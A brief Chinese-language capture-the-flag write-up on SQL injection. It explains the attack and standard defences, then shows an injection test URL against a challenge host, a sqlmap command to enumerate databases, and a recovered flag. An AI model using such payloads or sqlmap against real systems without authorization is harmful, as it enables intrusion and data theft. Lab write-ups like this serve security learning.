SQL注入攻击是一种常见的网络攻击方式,攻击者通过在用户输入的数据中插入恶意代码,从而获取数据库中的敏感信息或者执行未授权的操作。为了防范SQL注入攻击,我们应该在应用程序中使用参数化查询这样的安全措施来防范这种攻击。同时,我们还应该加强数据过滤和输入验证,以确保用户输入的数据符合预期的格式和类型。
测试注入
http://61.147.171.105:61542/?id=1' or 1=2 --+
得到flag:cyberpeace{655c447c90fba82fe9d9f71df3fb37d8}
使用sqlmap跑
sqlmap -u "http://61.147.171.105:61542/?id=1" -dbs
sql注入只是测试下,因为flag是在php代码里,sql注入拿不到flag。